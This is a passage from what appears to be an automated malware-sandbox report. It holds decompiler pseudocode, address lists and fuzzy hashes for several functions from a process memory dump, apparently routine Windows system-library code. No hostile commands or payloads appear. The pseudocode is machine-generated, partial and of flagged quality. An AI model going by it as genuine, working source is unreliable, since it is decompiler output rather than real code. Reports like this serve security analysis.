						E01248A62( *(_t61 + 0x5c), _t18,  *((intOrPtr*)(_t61 + 0x30)),  *((intOrPtr*)(_t61 + 0x34)),  *((intOrPtr*)(_t61 + 0x3c)));
					}
					_t52 =  *(_t61 + 0x5c);
					_t11 = _t61 + 0x78; // 0x78
					_t34 = E011A9702(_t40, _t11,  *(_t61 + 0x5c),  *((intOrPtr*)(_t61 + 0x74)), 0);
					_t24 = _t34 | 0xffffffff;
					asm("lock xadd [esi], eax");
					if((_t34 | 0xffffffff) == 0) {
						 *0x126b1e0(_t61);
						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t61 + 4))))))();
					}
					goto L7;
				}
				L4:
				_t31 = 0x7ffe0386;
				goto L5;
			}




















                                                                          0x01190055
                                                                          0x0119005d
                                                                          0x01190062
                                                                          0x0119006c
                                                                          0x0119006f
                                                                          0x01190074
                                                                          0x0119007a
                                                                          0x0119007a
                                                                          0x01190080
                                                                          0x01190080
                                                                          0x01190087
                                                                          0x0119008d
                                                                          0x0119008f
                                                                          0x01190093
                                                                          0x01190095
                                                                          0x0119009b
                                                                          0x011900f8
                                                                          0x011900fb
                                                                          0x011900fc
                                                                          0x011900ff
                                                                          0x01190108
                                                                          0x01190108
                                                                          0x011900a2
                                                                          0x011900a6
                                                                          0x011900b3
                                                                          0x011900bc
                                                                          0x011900c5
                                                                          0x011900ca
                                                                          0x011dc01e
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x011dc02d
                                                                          0x011900d5
                                                                          0x011900d9
                                                                          0x011dc03d
                                                                          0x011dc046
                                                                          0x011dc046
                                                                          0x011900df
                                                                          0x011900e2
                                                                          0x011900ea
                                                                          0x011900ef
                                                                          0x011900f2
                                                                          0x011900f6
                                                                          0x01190111
                                                                          0x01190117
                                                                          0x01190117
                                                                          0x00000000
                                                                          0x011900f6
                                                                          0x011900d0
                                                                          0x011900d0
                                                                          0x00000000

                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 5182fec6f7b73088be90464302e7b5af8f99c6bed510598f3a7d426ca9f2473d
                                                                          • Instruction ID: 43d4b4aeb4ede4589ced7ea8c9f61532444aa38581ce94a9418b5a9ccc8ac37f
                                                                          • Opcode Fuzzy Hash: 5182fec6f7b73088be90464302e7b5af8f99c6bed510598f3a7d426ca9f2473d
                                                                          • Instruction Fuzzy Hash: 4531BF35601B04CFDB2ACF28C844B9AB7E5FF88754F18456DE5A687B90DB75AC01CB90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 011F6C0A, Relevance: .1, Instructions: 79COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 77%
                                                                          			E011F6C0A(signed short* __ecx, signed char __edx, signed char _a4, signed char _a8) {
				signed short* _v8;
				signed char _v12;
				void* _t22;
				signed char* _t23;
				intOrPtr _t24;
				signed short* _t44;
				void* _t47;
				signed char* _t56;
				signed char* _t58;

				_t48 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t44 = __ecx;
				_v12 = __edx;
				_v8 = __ecx;
				_t22 = E01197D50();
				_t58 = 0x7ffe0384;
				if(_t22 == 0) {
					_t23 = 0x7ffe0384;
				} else {
					_t23 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				}
				if( *_t23 != 0) {
					_t24 =  *0x1267b9c; // 0x0
					_t47 = ( *_t44 & 0x0000ffff) + 0x30;
					_t23 = L01194620(_t48,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t24 + 0x180000, _t47);
					_t56 = _t23;
					if(_t56 != 0) {
						_t56[0x24] = _a4;
						_t56[0x28] = _a8;
						_t56[6] = 0x1420;
						_t56[0x20] = _v12;
						_t14 =  &(_t56[0x2c]); // 0x2c
						E011BF3E0(_t14, _v8[2],  *_v8 & 0x0000ffff);
						_t56[0x2c + (( *_v8 & 0x0000ffff) >> 1) * 2] = 0;
						if(E01197D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						}
						_push(_t56);
						_push(_t47 - 0x20);
						_push(0x402);
						_push( *_t58 & 0x000000ff);
						E011B9AE0();
						_t23 = L011977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t56);
					}
				}
				return _t23;
			}












                                                                          0x011f6c0a
                                                                          0x011f6c0f
                                                                          0x011f6c10
                                                                          0x011f6c13
                                                                          0x011f6c15
                                                                          0x011f6c19
                                                                          0x011f6c1c
                                                                          0x011f6c21
                                                                          0x011f6c28
                                                                          0x011f6c3a
                                                                          0x011f6c2a
                                                                          0x011f6c33
                                                                          0x011f6c33
                                                                          0x011f6c3f
                                                                          0x011f6c48
                                                                          0x011f6c4d
                                                                          0x011f6c60
                                                                          0x011f6c65
                                                                          0x011f6c69
                                                                          0x011f6c73
                                                                          0x011f6c79
                                                                          0x011f6c7f
                                                                          0x011f6c86
                                                                          0x011f6c90
                                                                          0x011f6c94
                                                                          0x011f6ca6
                                                                          0x011f6cb2
                                                                          0x011f6cbd
                                                                          0x011f6cbd
                                                                          0x011f6cc3
                                                                          0x011f6cc7
                                                                          0x011f6ccb
                                                                          0x011f6cd0
                                                                          0x011f6cd1
                                                                          0x011f6ce2
                                                                          0x011f6ce2
                                                                          0x011f6c69
                                                                          0x011f6ced

                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 44675ffba1307d8d4eb1e96ce8dd7c1646e1f2d7fe93924cc3356ae9f8148665
                                                                          • Instruction ID: 3355274fc93066fbf3263f375e4947272908a0cacf72644fc87e830065eb97fa
                                                                          • Opcode Fuzzy Hash: 44675ffba1307d8d4eb1e96ce8dd7c1646e1f2d7fe93924cc3356ae9f8148665
                                                                          • Instruction Fuzzy Hash: 72219AB1A00645ABDB19DB68D880F6AB7B8FF48704F140069FA04D7790D734E911CBA4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 011B90AF, Relevance: .1, Instructions: 76COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 82%
                                                                          			E011B90AF(intOrPtr __ecx, void* __edx, intOrPtr* _a4) {
				intOrPtr* _v0;
				void* _v8;
				signed int _v12;
				intOrPtr _v16;
				char _v36;
				void* _t38;
				intOrPtr _t41;
				void* _t44;
				signed int _t45;
				intOrPtr* _t49;
				signed int _t57;
				signed int _t58;
				intOrPtr* _t59;
				void* _t62;
				void* _t63;
				void* _t65;
				void* _t66;
				signed int _t69;
				intOrPtr* _t70;
				void* _t71;
				intOrPtr* _t72;
				intOrPtr* _t73;
				char _t74;

				_t65 = __edx;
				_t57 = _a4;
				_t32 = __ecx;
				_v8 = __edx;
				_t3 = _t32 + 0x14c; // 0x14c
				_t70 = _t3;
				_v16 = __ecx;
				_t72 =  *_t70;
				while(_t72 != _t70) {
					if( *((intOrPtr*)(_t72 + 0xc)) != _t57) {
						L24:
						_t72 =  *_t72;
						continue;
					}
					_t30 = _t72 + 0x10; // 0x10
					if(E011CD4F0(_t30, _t65, _t57) == _t57) {
						return 0xb7;
					}
					_t65 = _v8;
					goto L24;
				}
				_t61 = _t57;
				_push( &_v12);
				_t66 = 0x10;
				if(E011AE5E0(_t57, _t66) < 0) {
					return 0x216;
				}
				_t73 = L01194620(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
				if(_t73 == 0) {
					_t38 = 0xe;
					return _t38;
				}
				_t9 = _t73 + 0x10; // 0x10
				 *((intOrPtr*)(_t73 + 0xc)) = _t57;
				E011BF3E0(_t9, _v8, _t57);
				_t41 =  *_t70;
				if( *((intOrPtr*)(_t41 + 4)) != _t70) {
					_t62 = 3;
					asm("int 0x29");
					_push(_t62);
					_push(_t57);
					_push(_t73);
					_push(_t70);
					_t71 = _t62;
					_t74 = 0;
					_v36 = 0;
					_t63 = E011AA2F0(_t62, _t71, 1, 6,  &_v36);
					if(_t63 == 0) {
						L20:
						_t44 = 0x57;
						return _t44;
					}
					_t45 = _v12;
					_t58 = 0x1c;
					if(_t45 < _t58) {
						goto L20;
					}
					_t69 = _t45 / _t58;
					if(_t69 == 0) {
						L19:
						return 0xe8;
					}
					_t59 = _v0;
					do {
						if( *((intOrPtr*)(_t63 + 0xc)) != 2) {
							goto L18;
						}
						_t49 =  *((intOrPtr*)(_t63 + 0x14)) + _t71;
						 *_t59 = _t49;
						if( *_t49 != 0x53445352) {
							goto L18;
						}
						 *_a4 =  *((intOrPtr*)(_t63 + 0x10));
						return 0;
						L18:
						_t63 = _t63 + 0x1c;
						_t74 = _t74 + 1;
					} while (_t74 < _t69);
					goto L19;
				}
				 *_t73 = _t41;
				 *((intOrPtr*)(_t73 + 4)) = _t70;
				 *((intOrPtr*)(_t41 + 4)) = _t73;
				 *_t70 = _t73;
				 *(_v16 + 0xdc) =  *(_v16 + 0xdc) | 0x00000010;
				return 0;
			}


























                                                                          0x011b90af
                                                                          0x011b90b8
                                                                          0x011b90bb
                                                                          0x011b90bf
                                                                          0x011b90c2
                                                                          0x011b90c2
                                                                          0x011b90c8
                                                                          0x011b90cb
                                                                          0x011b90cd
                                                                          0x011f14d7
                                                                          0x011f14eb
                                                                          0x011f14eb
                                                                          0x00000000
                                                                          0x011f14eb
                                                                          0x011f14db
                                                                          0x011f14e6
                                                                          0x00000000
                                                                          0x011f14f2
                                                                          0x011f14e8
                                                                          0x00000000
                                                                          0x011f14e8
                                                                          0x011b90d8
                                                                          0x011b90da
                                                                          0x011b90dd
                                                                          0x011b90e5
                                                                          0x00000000
                                                                          0x011b9139
                                                                          0x011b90fa
                                                                          0x011b90fe
                                                                          0x011b9142
                                                                          0x00000000
                                                                          0x011b9142
                                                                          0x011b9104
                                                                          0x011b9107
                                                                          0x011b910b
                                                                          0x011b9110
                                                                          0x011b9118
                                                                          0x011b9147
                                                                          0x011b9148
                                                                          0x011b914f
                                                                          0x011b9150
                                                                          0x011b9151
                                                                          0x011b9152
                                                                          0x011b9156
                                                                          0x011b915d
                                                                          0x011b9160
                                                                          0x011b9168
                                                                          0x011b916c
                                                                          0x011b91bc
                                                                          0x011b91be
                                                                          0x00000000
                                                                          0x011b91be
                                                                          0x011b916e
                                                                          0x011b9173
                                                                          0x011b9176
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x011b917c
                                                                          0x011b9180
                                                                          0x011b91b5
                                                                          0x00000000
                                                                          0x011b91b5
                                                                          0x011b9182
                                                                          0x011b9185
                                                                          0x011b9189
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x011b918e
                                                                          0x011b9190
                                                                          0x011b9198
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x011b91a0
                                                                          0x00000000
                                                                          0x011b91ad
                                                                          0x011b91ad
                                                                          0x011b91b0
                                                                          0x011b91b1
                                                                          0x00000000
                                                                          0x011b9185
                                                                          0x011b911a
                                                                          0x011b911c
                                                                          0x011b911f
                                                                          0x011b9125
                                                                          0x011b9127
                                                                          0x00000000

                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                                                          • Instruction ID: 0ea55cff9d0f931d2eb6ca46926a7f2d1327b7ab8b28144975112fa08ccaa3e2
                                                                          • Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                                                          • Instruction Fuzzy Hash: FC2195B5A00309EFDB25DF59C884E9AFBF8EB54324F15846EEA4597210D330ED01CB90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 011A3B7A, Relevance: .1, Instructions: 75COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 59%
                                                                          			E011A3B7A(void* __ecx) {
				signed int _v8;
				char _v12;
				intOrPtr _v20;
				intOrPtr _t17;
				intOrPtr _t26;
				void* _t35;
				void* _t38;
				void* _t41;
				intOrPtr _t44;

				_t17 =  *0x12684c4; // 0x0
				_v12 = 1;
				_v8 =  *0x12684c0 * 0x4c;
				_t41 = __ecx;
				_t35 = L01194620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t17 + 0x000c0000 | 0x00000008,  *0x12684c0 * 0x4c);
				if(_t35 == 0) {
					_t44 = 0xc0000017;
				} else {
					_push( &_v8);
					_push(_v8);
					_push(_t35);
					_push(4);
					_push( &_v12);
					_push(0x6b);
					_t44 = E011BAA90();
					_v20 = _t44;
					if(_t44 >= 0) {
						E011BFA60( *((intOrPtr*)(_t41 + 0x20)), 0,  *0x12684c0 * 0xc);
						_t38 = _t35;
						if(_t35 < _v8 + _t35) {
							do {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t38 = _t38 +  *((intOrPtr*)(_t38 + 4));
							} while (_t38 < _v8 + _t35);
							_t44 = _v20;
						}
					}
					_t26 =  *0x12684c4; // 0x0
					L011977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t26 + 0xc0000, _t35);
				}
				return _t44;
			}












                                                                          0x011a3b89
                                                                          0x011a3b96
                                                                          0x011a3ba1
                                                                          0x011a3bab
                                                                          0x011a3bb5
                                                                          0x011a3bb9
                                                                          0x011e6298
                                                                          0x011a3bbf
                                                                          0x011a3bc2
                                                                          0x011a3bc3
                                                                          0x011a3bc9
                                                                          0x011a3bca
                                                                          0x011a3bcc
                                                                          0x011a3bcd
                                                                          0x011a3bd4
                                                                          0x011a3bd6
                                                                          0x011a3bdb
                                                                          0x011a3bea
                                                                          0x011a3bf7
                                                                          0x011a3bfb
                                                                          0x011a3bff
                                                                          0x011a3c09
                                                                          0x011a3c0a
                                                                          0x011a3c0b
                                                                          0x011a3c0f
                                                                          0x011a3c14
                                                                          0x011a3c18
                                                                          0x011a3c18
                                                                          0x011a3bfb
                                                                          0x011a3c1b
                                                                          0x011a3c30
                                                                          0x011a3c30
                                                                          0x011a3c3d

                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: a48fab06dce5279c2c1cc1b74544bcf3b1a47d215a178ef71af80548dd1751f5
                                                                          • Instruction ID: 73b589c7b010d0791abccce586acfa78d75b24cc3084a0a8da2e67349f780325
                                                                          • Opcode Fuzzy Hash: a48fab06dce5279c2c1cc1b74544bcf3b1a47d215a178ef71af80548dd1751f5
                                                                          • Instruction Fuzzy Hash: 3D21A4B2600205EFC718DF58DD85F5ABBBDFB44748F154069E608AB251D371ED01CBA0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 011F6CF0, Relevance: .1, Instructions: 74COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 80%
                                                                          			E011F6CF0(void* __edx, intOrPtr _a4, short _a8) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v28;
				char _v36;
				char _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char* _t21;
				void* _t24;
				void* _t36;
				void* _t38;
				void* _t46;

				_push(_t36);
				_t46 = __edx;
				_v12 = 0;
				_v8 = 0;
				_v20 = 0;
				_v16 = 0;
				if(E01197D50() == 0) {
					_t21 = 0x7ffe0384;
				} else {
					_t21 = ( *[fs:0x30])[0x50] + 0x22a;
				}
				if( *_t21 != 0) {
					_t21 =  *[fs:0x30];
					if((_t21[0x240] & 0x00000004) != 0) {
						if(E01197D50() == 0) {
							_t21 = 0x7ffe0385;
						} else {
							_t21 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t21 & 0x00000020) != 0) {
							_t56 = _t46;
							if(_t46 == 0) {
								_t46 = 0x1155c80;
							}
							_push(_t46);
							_push( &_v12);
							_t24 = E011AF6E0(_t36, 0, _t46, _t56);
							_push(_a4);
							_t38 = _t24;
							_push( &_v28);
							_t21 = E011AF6E0(_t38, 0, _t46, _t56);
							if(_t38 != 0) {
								if(_t21 != 0) {
									E011F7016(_a8, 0, 0, 0,  &_v36,  &_v28);
									L01192400( &_v52);
								}
								_t21 = L01192400( &_v28);
							}
						}
					}
				}
				return _t21;
			}



















                                                                          0x011f6cfb
                                                                          0x011f6d00
                                                                          0x011f6d02
                                                                          0x011f6d06
                                                                          0x011f6d0a
                                                                          0x011f6d0e
                                                                          0x011f6d19
                                                                          0x011f6d2b
                                                                          0x011f6d1b
                                                                          0x011f6d24
                                                                          0x011f6d24
                                                                          0x011f6d33
                                                                          0x011f6d39
                                                                          0x011f6d46
                                                                          0x011f6d4f
                                                                          0x011f6d61
                                                                          0x011f6d51
                                                                          0x011f6d5a
                                                                          0x011f6d5a
                                                                          0x011f6d69
                                                                          0x011f6d6b
                                                                          0x011f6d6d
                                                                          0x011f6d6f
                                                                          0x011f6d6f
                                                                          0x011f6d74
                                                                          0x011f6d79
                                                                          0x011f6d7a
                                                                          0x011f6d7f
                                                                          0x011f6d82
                                                                          0x011f6d88
                                                                          0x011f6d89
                                                                          0x011f6d90
                                                                          0x011f6d94
                                                                          0x011f6da7
                                                                          0x011f6db1
                                                                          0x011f6db1
                                                                          0x011f6dbb
                                                                          0x011f6dbb
                                                                          0x011f6d90
                                                                          0x011f6d69
                                                                          0x011f6d46
                                                                          0x011f6dc6

                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 3ecb869245cc29292f8aa48b5712c7ca4d19bce1bff5bc7864d6cfc55b2e8c88
                                                                          • Instruction ID: 78b1bb2e180291612ff6ff8e5867f5c5cf126eb1819bb7ff8ec244ba9a754f3d
                                                                          • Opcode Fuzzy Hash: 3ecb869245cc29292f8aa48b5712c7ca4d19bce1bff5bc7864d6cfc55b2e8c88
                                                                          • Instruction Fuzzy Hash: CF2134724007469BD719DF28C944B6FBBECEF91244F04045AFB80C7290E734C948C6A2
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0124070D, Relevance: .1, Instructions: 72COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 67%
                                                                          			E0124070D(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				char _v8;
				intOrPtr _v11;
				signed int _v12;
				intOrPtr _v15;
				signed int _v16;
				intOrPtr _v28;
				void* __ebx;
				char* _t32;
				signed int* _t38;
				signed int _t60;

				_t38 = __ecx;
				_v16 = __edx;
				_t60 = E012407DF(__ecx, __edx,  &_a4,  &_a8, 2);
				if(_t60 != 0) {
					_t7 = _t38 + 0x38; // 0x29cd5903
					_push( *_t7);
					_t9 = _t38 + 0x34; // 0x6adeeb00
					_push( *_t9);
					_v12 = _a8 << 0xc;
					_t11 = _t38 + 4; // 0x5de58b5b
					_push(0x4000);
					_v8 = (_a4 << 0xc) + (_v16 - ( *__ecx & _v16) >> 4 <<  *_t11) + ( *__ecx & _v16);
					E0123AFDE( &_v8,  &_v12);
					E01241293(_t38, _v28, _t60);
					if(E01197D50() == 0) {
						_t32 = 0x7ffe0380;
					} else {
						_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						_t21 = _t38 + 0x3c; // 0xc3595e5f
						E012314FB(_t38,  *_t21, _v11, _v15, 0xd);
					}
				}
				return  ~_t60;
			}













                                                                          0x0124071b
                                                                          0x01240724
                                                                          0x01240734
                                                                          0x01240738
                                                                          0x0124074b
                                                                          0x0124074b
                                                                          0x01240753
                                                                          0x01240753
                                                                          0x01240759
                                                                          0x0124075d
                                                                          0x01240774
                                                                          0x01240779
                                                                          0x0124077d
                                                                          0x01240789
                                                                          0x01240795
                                                                          0x012407a7
                                                                          0x01240797
                                                                          0x012407a0
                                                                          0x012407a0
                                                                          0x012407af
                                                                          0x012407c4
                                                                          0x012407cd
                                                                          0x012407cd
                                                                          0x012407af
                                                                          0x012407dc

                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                                                                          • Instruction ID: 124a6924bbcf4c676594fc2dc4449673a314d00772b916fc71a4cfd7b2ffc933
                                                                          • Opcode Fuzzy Hash: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                                                                          • Instruction Fuzzy Hash: E02104362142019FE709DF18C880BAABBA5EFD4350F048569FB958B385D730D959CB96
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 011F7794, Relevance: .1, Instructions: 70COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 82%
                                                                          			E011F7794(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, unsigned int _a8, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _t21;
				void* _t24;
				intOrPtr _t25;
				void* _t36;
				short _t39;
				signed char* _t42;
				unsigned int _t46;
				void* _t50;

				_push(__ecx);
				_push(__ecx);
				_t21 =  *0x1267b9c; // 0x0
				_t46 = _a8;
				_v12 = __edx;
				_v8 = __ecx;
				_t4 = _t46 + 0x2e; // 0x2e
				_t36 = _t4;
				_t24 = L01194620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t21 + 0x180000, _t36);
				_t50 = _t24;
				if(_t50 != 0) {
					_t25 = _a4;
					if(_t25 == 5) {
						L3:
						_t39 = 0x14b1;
					} else {
						_t39 = 0x14b0;
						if(_t25 == 6) {
							goto L3;
						}
					}
					 *((short*)(_t50 + 6)) = _t39;
					 *((intOrPtr*)(_t50 + 0x28)) = _t25;
					_t11 = _t50 + 0x2c; // 0x2c
					 *((intOrPtr*)(_t50 + 0x20)) = _v8;
					 *((intOrPtr*)(_t50 + 0x24)) = _v12;
					E011BF3E0(_t11, _a12, _t46);
					 *((short*)(_t50 + 0x2c + (_t46 >> 1) * 2)) = 0;
					if(E01197D50() == 0) {
						_t42 = 0x7ffe0384;
					} else {
						_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t50);
					_t19 = _t36 - 0x20; // 0xe
					_push(0x403);
					_push( *_t42 & 0x000000ff);
					E011B9AE0();
					_t24 = L011977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t50);
				}
				return _t24;
			}













                                                                          0x011f7799
                                                                          0x011f779a
                                                                          0x011f779b
                                                                          0x011f77a3
                                                                          0x011f77ab
                                                                          0x011f77ae
                                                                          0x011f77b1
                                                                          0x011f77b1
                                                                          0x011f77bf
                                                                          0x011f77c4
                                                                          0x011f77c8
                                                                          0x011f77ce
                                                                          0x011f77d4
                                                                          0x011f77e0
                                                                          0x011f77e0
                                                                          0x011f77d6
                                                                          0x011f77d6
                                                                          0x011f77de
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x011f77de
                                                                          0x011f77e5
                                                                          0x011f77f0
                                                                          0x011f77f3
                                                                          0x011f77f6
                                                                          0x011f77fd
                                                                          0x011f7800
                                                                          0x011f780c
                                                                          0x011f7818
                                                                          0x011f782b
                                                                          0x011f781a
                                                                          0x011f7823
                                                                          0x011f7823
                                                                          0x011f7830
                                                                          0x011f7831
                                                                          0x011f7838
                                                                          0x011f783d
                                                                          0x011f783e
                                                                          0x011f784f
                                                                          0x011f784f
                                                                          0x011f785a

                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: ca5a0dd4f3f29454ac30cdee60df56802b5b9d6d88ce0b80430df9abee989a9f
                                                                          • Instruction ID: d05cf2573ac7a0a3d96664df257147bf3b95539c158b07f104ab5ac17c93f868
                                                                          • Opcode Fuzzy Hash: ca5a0dd4f3f29454ac30cdee60df56802b5b9d6d88ce0b80430df9abee989a9f
                                                                          • Instruction Fuzzy Hash: C8218172500A04ABC729DF69DC94EABBBA9EF48744F10456DF60AD7790D734E900CBA4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0119AE73, Relevance: .1, Instructions: 70COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 96%
                                                                          			E0119AE73(intOrPtr __ecx, void* __edx) {
				intOrPtr _v8;
				void* _t19;
				char* _t22;
				signed char* _t24;
				intOrPtr _t25;
				intOrPtr _t27;
				void* _t31;
				intOrPtr _t36;
				char* _t38;
				signed char* _t42;

				_push(__ecx);
				_t31 = __edx;
				_v8 = __ecx;
				_t19 = E01197D50();
				_t38 = 0x7ffe0384;
				if(_t19 != 0) {
					_t22 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t22 = 0x7ffe0384;
				}
				_t42 = 0x7ffe0385;
				if( *_t22 != 0) {
					if(E01197D50() == 0) {
						_t24 = 0x7ffe0385;
					} else {
						_t24 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t24 & 0x00000010) != 0) {
						goto L17;
					} else {
						goto L3;
					}
				} else {
					L3:
					_t27 = E01197D50();
					if(_t27 != 0) {
						_t27 =  *[fs:0x30];
						_t38 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22a;
					}
					if( *_t38 != 0) {
						_t27 =  *[fs:0x30];
						if(( *(_t27 + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						_t27 = E01197D50();
						if(_t27 != 0) {
							_t27 =  *[fs:0x30];
							_t42 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22b;
						}
						if(( *_t42 & 0x00000020) != 0) {
							L17:
							_t25 = _v8;
							_t36 = 0;
							if(_t25 != 0) {
								_t36 =  *((intOrPtr*)(_t25 + 0x18));
							}
							_t27 = E011F7794( *((intOrPtr*)(_t31 + 0x18)), _t36,  *((intOrPtr*)(_t31 + 0x94)),  *(_t31 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_t31 + 0x28)));
						}
						goto L5;
					} else {
						L5:
						return _t27;
					}
				}
			}













                                                                          0x0119ae78
                                                                          0x0119ae7c
                                                                          0x0119ae7e
                                                                          0x0119ae81
                                                                          0x0119ae86
                                                                          0x0119ae8d
                                                                          0x011e2691
                                                                          0x0119ae93
                                                                          0x0119ae93
                                                                          0x0119ae93
                                                                          0x0119ae98
                                                                          0x0119ae9d
                                                                          0x011e26a2
                                                                          0x011e26b4
                                                                          0x011e26a4
                                                                          0x011e26ad
                                                                          0x011e26ad
                                                                          0x011e26b9
                                                                          0x00000000
                                                                          0x011e26bb
                                                                          0x00000000
                                                                          0x011e26bb
                                                                          0x0119aea3
                                                                          0x0119aea3
                                                                          0x0119aea3
                                                                          0x0119aeaa
                                                                          0x011e26c0
                                                                          0x011e26c9
                                                                          0x011e26c9
                                                                          0x0119aeb3
                                                                          0x011e26d4
                                                                          0x011e26e1
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x011e26e7
                                                                          0x011e26ee
                                                                          0x011e26f0
                                                                          0x011e26f9
                                                                          0x011e26f9
                                                                          0x011e2702
                                                                          0x011e2708
                                                                          0x011e2708
                                                                          0x011e270b
                                                                          0x011e270f
                                                                          0x011e2711
                                                                          0x011e2711
                                                                          0x011e2725
                                                                          0x011e2725
                                                                          0x00000000
                                                                          0x0119aeb9
                                                                          0x0119aeb9
                                                                          0x0119aebf
                                                                          0x0119aebf
                                                                          0x0119aeb3

                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                                                                          • Instruction ID: 5c5df7a24a5159db28afc3d02d59e7276cf7abfe47c5bb404136fc525fb12450
                                                                          • Opcode Fuzzy Hash: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                                                                          • Instruction Fuzzy Hash: 9621F672601A859FEB1E9BADC958B2577E8EF45344F1A01A0DD048B792D774DC40CAA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 011AFD9B, Relevance: .1, Instructions: 69COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 93%
                                                                          			E011AFD9B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				intOrPtr _v8;
				void* _t19;
				intOrPtr _t29;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t37;
				intOrPtr* _t40;

				_t35 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t37 = 0;
				_v8 = __edx;
				_t29 = __ecx;
				if( *((intOrPtr*)( *[fs:0x18] + 0xfbc)) != 0) {
